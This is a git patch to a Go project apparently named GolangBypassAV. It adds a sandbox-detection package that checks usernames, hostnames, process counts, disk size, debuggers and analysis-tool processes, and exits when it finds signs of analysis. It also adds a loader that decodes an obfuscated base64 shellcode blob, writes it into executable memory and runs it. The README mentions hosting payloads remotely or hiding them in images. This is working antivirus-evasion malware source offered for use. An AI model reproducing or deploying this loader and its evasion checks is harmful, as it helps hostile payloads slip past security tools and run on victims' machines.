From 7fa29a0d1d7ab0e08da6ba2fc61529ec73826bbf Mon Sep 17 00:00:00 2001 From: Administrator <1850597152@qq.com> Date: Tue, 17 Aug 2021 00:03:56 +0800 Subject: [PATCH] =?UTF-8?q?=E5=A2=9E=E5=8A=A0=E6=B2=99=E7=AE=B1=E6=A3=80?= =?UTF-8?q?=E6=B5=8B?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- README.md | 11 +++ sandbox/sandbox.go | 242 +++++++++++++++++++++++++++++++++++++++++++++ test3/main.go | 5 +- test5/main.go | 126 +++++++++++++++++++++++ 4 files changed, 382 insertions(+), 2 deletions(-) create mode 100644 sandbox/sandbox.go create mode 100644 test5/main.go diff --git a/README.md b/README.md index cb0e3da..165aa36 100644 --- a/README.md +++ b/README.md @@ -8,6 +8,10 @@ ## 思路 静态免杀比较简单,可选加密payload或者分离payload。 分离免杀效果比加密payload的效果要好。 +初次之外还可以考虑如下方式: +由于要引入net包,导致文件大小比较大。我不做测试了。 +把payload分离远程服务器 +把payload隐写到图片 ## 说明 test1、test2效果还可以。 @@ -27,3 +31,10 @@ go build -ldflags="-s -w" -o main1.exe go build -ldflags="-s -w -H=windowsgui" -o main2.exe ``` + + + +## 参考 +https://github.com/brimstone/go-shellcode +https://github.com/timwhitez/Doge-Loader +https://github.com/fcre1938/goShellCodeByPassVT \ No newline at end of file diff --git a/sandbox/sandbox.go b/sandbox/sandbox.go new file mode 100644 index 0000000..2c9bd13 --- /dev/null +++ b/sandbox/sandbox.go @@ -0,0 +1,242 @@ +package sandbox + +import ( + "os" + "os/user" + "path/filepath" + "strings" + "syscall" + "unsafe" +) + +type PROCESSENTRY32 struct { + dwSize uint32 + cntUsage uint32 + th32ProcessID uint32 + th32DefaultHeapID uintptr + th32ModuleID uint32 + cntThreads uint32 + th32ParentProcessID uint32 + pcPriClassBase int32 + dwFlags uint32 + szExeFile [260]uint16 +} + +var ( + kernel322 = syscall.NewLazyDLL("kernel32.dll") + CreateToolhelp32Snapshot = kernel322.NewProc("CreateToolhelp32Snapshot") + Process32First = kernel322.NewProc("Process32FirstW") + Process32Next = kernel322.NewProc("Process32NextW") + CloseHandle = kernel322.NewProc("CloseHandle") +) + +var ( + //在此处添加沙箱常见用户名 + userNames = []string{ + "John", "Phil", + } + //在此处添加沙箱常见主机名 + hostNames = []string{ + "John", "Jason", + } +) + +func checkUserName(param interface{}) (code int) { + username, err := user.Current() + if err != nil { + return 1 + } + names, ok := param.([]string) + if !ok { + //fmt.Println("user names must be []string") + return 1 + } + for _, name := range names { + if strings.Contains(strings.ToLower(username.Username), strings.ToLower(name)) { + return 0 + } + } + //fmt.Printf("1.UserName OK!\n") + return -1 +} + +func checkDebugger(param interface{}) (code int) { + var kernel32, _ = syscall.LoadLibrary("kernel32.dll") + var IsDebuggerPresent, _ = syscall.GetProcAddress(kernel32, "IsDebuggerPresent") + var nargs uintptr = 0 + + if debuggerPresent, _, err := syscall.Syscall(uintptr(IsDebuggerPresent), nargs, 0, 0, 0); err != 0 { + //fmt.Printf("Error determining whether debugger present.\n") + } else { + if debuggerPresent != 0 { + return 0 + } + } + //fmt.Printf("2.Debugger OK!\n") + return -1 +} + +func checkFileName(param interface{}) (code int) { + length, ok := param.(int) + if !ok { + //fmt.Println("the length of filename must be integer") + return 1 + } + actualName := filepath.Base(os.Args[0]) + if len(actualName) >= length { + return 0 + } + //fmt.Printf("3.FileName OK!\n") + return -1 +} + +func checkProcessNum(param interface{}) (code int) { + minRunningProcesses, ok := param.(int) + if !ok { + //fmt.Println("the number of process must be integer") + return 1 + } + hProcessSnap, _, _ := CreateToolhelp32Snapshot.Call(2, 0) + if hProcessSnap < 0 { + return -1 + } + defer CloseHandle.Call(hProcessSnap) + + exeNames := make([]string, 0, 100) + var pe32 PROCESSENTRY32 + pe32.dwSize = uint32(unsafe.Sizeof(pe32)) + + Process32First.Call(hProcessSnap, uintptr(unsafe.Pointer(&pe32))) + + for { + + exeNames = append(exeNames, syscall.UTF16ToString(pe32.szExeFile[:260])) + + retVal, _, _ := Process32Next.Call(hProcessSnap, uintptr(unsafe.Pointer(&pe32))) + if retVal == 0 { + break + } + + } + runningProcesses := 0 + for range exeNames { + runningProcesses += 1 + } + + if runningProcesses < minRunningProcesses { + return 0 + } + //fmt.Printf("4.ProcessNum OK!\n") + return -1 +} + +func checkDiskSize(param interface{}) (code int) { + minDiskSizeGB, ok := param.(float32) + if !ok { + //fmt.Println("the size of disk must be float32") + return 1 + } + //var kernel323 = syscall.NewLazyDLL("kernel32.dll") + var ( + getDiskFreeSpaceEx = kernel322.NewProc("GetDiskFreeSpaceExW") + lpFreeBytesAvailable, lpTotalNumberOfBytes, lpTotalNumberOfFreeBytes int64 + ) + + getDiskFreeSpaceEx.Call( + uintptr(unsafe.Pointer(syscall.StringToUTF16Ptr("C:"))), + uintptr(unsafe.Pointer(&lpFreeBytesAvailable)), + uintptr(unsafe.Pointer(&lpTotalNumberOfBytes)), + uintptr(unsafe.Pointer(&lpTotalNumberOfFreeBytes))) + + diskSizeGB := float32(lpTotalNumberOfBytes) / 1073741824 + //fmt.Println(diskSizeGB) + if diskSizeGB < minDiskSizeGB { + return 0 + } + //fmt.Printf("5.DiskSize OK!\n") + return -1 +} +func checkHostName(param interface{}) (code int) { + hosts, ok := param.([]string) + if !ok { + //fmt.Println("slice of hostname must be []string") + return 1 + } + hostname, errorout := os.Hostname() + if errorout != nil { + os.Exit(1) + } + for _, host := range hosts { + if strings.Contains(strings.ToLower(hostname), strings.ToLower(host)) { + return 0 + } + } + //fmt.Printf("7.HostName OK!\n") + return -1 +} + +func checkBlacklist(param interface{}) (code int) { + EvidenceOfSandbox := make([]string, 0) + //在此处添加进程黑名单 + sandboxProcesses := [...]string{`sysdiag`, `sysdiag-gui`, `usysdiag`, `Dbgview`} + hProcessSnap1, _, _ := CreateToolhelp32Snapshot.Call(2, 0) + if hProcessSnap1 < 0 { + return -1 + } + defer CloseHandle.Call(hProcessSnap1) + + exeNames := make([]string, 0, 100) + var pe32 PROCESSENTRY32 + pe32.dwSize = uint32(unsafe.Sizeof(pe32)) + + Process32First.Call(hProcessSnap1, uintptr(unsafe.Pointer(&pe32))) + + for { + + exeNames = append(exeNames, syscall.UTF16ToString(pe32.szExeFile[:260])) + + retVal, _, _ := Process32Next.Call(hProcessSnap1, uintptr(unsafe.Pointer(&pe32))) + if retVal == 0 { + break + } + + } + + for _, exe := range exeNames { + for _, sandboxProc := range sandboxProcesses { + if strings.Contains(strings.ToLower(exe), strings.ToLower(sandboxProc)) { + EvidenceOfSandbox = append(EvidenceOfSandbox, exe) + } + } + } + + if len(EvidenceOfSandbox) != 0 { + return 0 + } + //fmt.Printf("6.Blacklist OK!\n") + return -1 +} + +func exec1(fn func(interface{}) int, param interface{}) { + if code := fn(param); code >= 0 { + os.Exit(code) + } +} + +func Check() { + //反沙箱(选用) + //检测用户名 + exec1(checkUserName, userNames) + //判断hostname是否为黑名单 + exec1(checkHostName, hostNames) + //检测进程数量是否大于后面输入的数 + exec1(checkProcessNum, 50) + //检测系统盘是否大于后面输入的数 + exec1(checkDiskSize, float32(60)) + //检测调试器 + exec1(checkDebugger, nil) + //检测文件名长度是否大于后面输入的数 + exec1(checkFileName, 12) + //判断进程名是否为黑名单 + exec1(checkBlacklist, nil) +} diff --git a/test3/main.go b/test3/main.go index f4e2f5a..84ad6de 100644 --- a/test3/main.go +++ b/test3/main.go @@ -13,6 +13,7 @@ const ( MEM_COMMIT = 0x1000 MEM_RESERVE = 0x2000 PAGE_EXECUTE_READWRITE = 0x40 + PAGE_EXECUTE = 0x10 PAGE_READWRITE = 0x04 ) @@ -92,8 +93,8 @@ func genEXE(charcode []byte) { } gd() var oldshellcodeperms uint32 - //改成读写执行 - virtualProtect1(unsafe.Pointer(&addr), uintptr(len(charcode)), PAGE_EXECUTE_READWRITE, unsafe.Pointer(&oldshellcodeperms)) + //改成可执行 + virtualProtect1(unsafe.Pointer(&addr), uintptr(len(charcode)), PAGE_EXECUTE, unsafe.Pointer(&oldshellcodeperms)) _, _, err = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode))) checkError(err) diff --git a/test5/main.go b/test5/main.go new file mode 100644 index 0000000..673eb21 --- /dev/null +++ b/test5/main.go @@ -0,0 +1,126 @@ +package main + +import ( + "GolangBypassAV/encry" + "GolangBypassAV/sandbox" + "encoding/base64" + "fmt" + "os" + "syscall" + "time" + "unsafe" +) + +const ( + MEM_COMMIT = 0x1000 + MEM_RESERVE = 0x2000 + PAGE_EXECUTE_READWRITE = 0x40 +) + +var kk = []byte{0x11} + +func base64Decode(data string) []byte { + data1, _ := base64.StdEncoding.DecodeString(data) + return data1 +} + +func base64Encode(data []byte) string { + bdata := base64.StdEncoding.EncodeToString(data) + return bdata +} + +func getEnCode(data []byte) string { + bdata := base64.StdEncoding.EncodeToString(data) + + bydata := []byte(bdata) + var shellcode []byte + + for i := 0; i < len(bydata); i++ { + shellcode = append(shellcode, bydata[i]+kk[0]) + } + return base64.StdEncoding.EncodeToString(shellcode) +} + +var ( + kernel32 = syscall.MustLoadDLL("kernel32.dll") + ntdll = syscall.MustLoadDLL("ntdll.dll") + VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") + RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") +) + +func getDeCode(string2 string) []byte { + + ss, _ := base64.StdEncoding.DecodeString(string2) + string2 = string(ss) + var shellcode []byte + + bydata := []byte(string2) + + for i := 0; i < len(bydata); i++ { + shellcode = append(shellcode, bydata[i]-kk[0]) + } + ssb, _ := base64.StdEncoding.DecodeString(string(shellcode)) + return ssb + +} + +func checkError(err error) { + if err != nil { + if err.Error() != "The operation completed successfully." { + println(err.Error()) + os.Exit(1) + } + } +} + +func genEXE(charcode []byte) { + + addr, _, err := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) + if addr == 0 { + checkError(err) + } + gd() + + _, _, err = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode))) + checkError(err) + + gd() + for j := 0; j < len(charcode); j++ { + charcode[j] = 0 + } + syscall.Syscall(addr, 0, 0, 0, 0) +} + +func gd() int64 { + time.Sleep(time.Duration(2) * time.Second) + + dd := time.Now().UTC().UnixNano() + return dd + 123456 + +} + +func getFileShellCode(file string) []byte { + data := encry.ReadFile(file) + //shellCodeHex := encry.GetBase64Data(data) + //fmt.Print(shellCodeHex) + return data +} + +func getFileShellCode1(file string) string { + data := encry.ReadFile(file) + shellCodeHex := base64Encode(data) + fmt.Print(shellCodeHex) + return shellCodeHex +} + +func main() { + //fmt.Println(1) + + //fmt.Print(getEnCode(getFileShellCode("C:\\Users\\Administrator\\Desktop\\payload.bin"))) + sandbox.Check() + + bbdata := "QFZ6VUZhVYCKUlJSUlZXY2JnU2RmZ2taXnVbfWRahWRqVnpdZnl5WnpCWnhkWoWKZlZ4YYVBgVxlZVlbZFVZUoNViXl3UlqEWlZZU4piQlNSdFl6SGdbU2Zmel1melRdYnuJWlJ1U354aXhqVIhbQnSAhlJ6UlJSUlZ6V4hZY39kUlliZlqFWlhWZF1iVFNbUnVVe2d8e0CKZlhdX1p5WlJ1a19edH1aXnRUhGJ0WVtVZlZTiGV7eHV3V15SQYh8VFZmRkFpaWpoVmRdYlRjW1J1U35iaoReZFZkXWJTiVtSdVNTeohkWmRSWWJiZ3lTaFdGa2h8V2piZ31TaHx6VUhUU1Nmh0B4aFZXa2h8el1Whn1hQEBAQGlogFJkc0ZEcmhGgXN+Z0FSVldoZGp/fmVaf4lic4FedYpqWUBKZ1pedH1aXnVbX150U19edH1TZlZXYmJzgEdnf35/QEppg3RCgVp6dFdThlRSVVJSU19edH1TZmZXY3J4X1NmZlhHZ0V+d4mHQGdHQn1zZFp/U2RVWWRkan9qZWVZW2Z+eFJSfFRWZn1bU4aGhWdde4dAQmZ6W4l8elWIQlOCVH1KWnp3V1p6dYFbiUlVQEBAQEBlZVlbZn1bU4Z6QVhYWYdAQmppUlVFaHVSYlJSZGFAYVVFZF5SYlJSR0phgUZSVlJSYHp6QEBAQF1EfUdfi15SfGtoZ3VVdWZScnpKgHJlW1eBRlOFhkaAalZfhmJzc0J5gF14a4p+QHmDemZFd0d8X0mFfWmIi31HcoJYf3mIamSIYIODX15GQGKGYXN4Z1dkf4tHSIZiRIl6ZWpJhINbdlJTZ3RDZ4pdZld/a2hGQWB6U19zRIGBc1iJeV2LZoZeVFKAakNKhXRYV0FyaFuEa2WEeGVnX1tjZFJGXXtSSFpZV3xraV+DWlVahl9URYlee2qLXXtaiF6LhHhnQ32Ga1hKRHSKU2BnVFJDXXtWSFpXdWFni2pBYIpTZnR+fXxraEZBXYtmhl5UfF9UeFJpaX9Dh0JIc2dUSF92il9ci19nQ4lFa0p+g3t6f0iKiWRkfmlnQ35ad3J6UouFglNog3VaXHRagEpaYEpBf4hpfXuLYXR7RXpKZlVqZmJTa2JKSEBZaEB+WXuJholGaEZkRohUZIFCRFViSGWIY354c1aIRVNSiFlIRWN5YXiHfHJDRYE8doRgflxXRX5KSnVnSUqFW3pZeHqEVmlaWkNBRH6Gi4ZeY4hWaH2Ee1hdYWB6X0VBfmBbd1l7Q3xkh1pHWkFKaIBHYmZ3RFV2dEZnWGGJe1lIfkOHc1Z0Z0dzQXeAg4BJVFyKdWSJWkhocoVIWn1lWGeJgXp2gUaDW35nX1mDRXVFi1pSYnNIiIVyW2hASmdaXnR+R1JSU1JSVlhFUlNSUlJWWEZiUlJSUlZYR2hcY2VGd0BnZFtfZWZBeltGQXpbSWZ6W0N8WEVSVFJSUlZ+WzxmWEdWgXJbRYdAZ2RaYVZaWmlSdV1rfnqIdVpSdGBXiFlpaWhXeWpkUmZSUlJSUmZeYYB/QERAQItWil56RUZde1ZCX4pFiV57WlJWe2NodlJOTg==" + shellCodeHex := getDeCode(bbdata) + gd() + genEXE(shellCodeHex) +}